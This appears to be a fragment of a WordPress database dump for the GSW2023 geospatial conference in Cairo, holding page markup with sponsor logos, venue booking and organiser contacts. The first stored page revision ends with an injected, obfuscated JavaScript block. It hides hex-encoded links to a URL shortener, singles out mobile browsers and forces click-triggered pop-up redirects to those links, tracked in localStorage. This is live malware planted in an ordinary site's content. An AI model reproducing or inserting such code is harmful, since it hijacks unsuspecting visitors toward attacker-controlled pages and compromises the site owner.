_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:41:34','2023-08-15 23:41:34','',3066,'https://gsw2023.com/?p=5226',0,'revision','',0),
(5227,1,'2023-08-15 23:42:52','2023-08-15 23:42:52','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731843{margin-top: -15px !important;}\"]</p>\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"]\r\n\r\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column 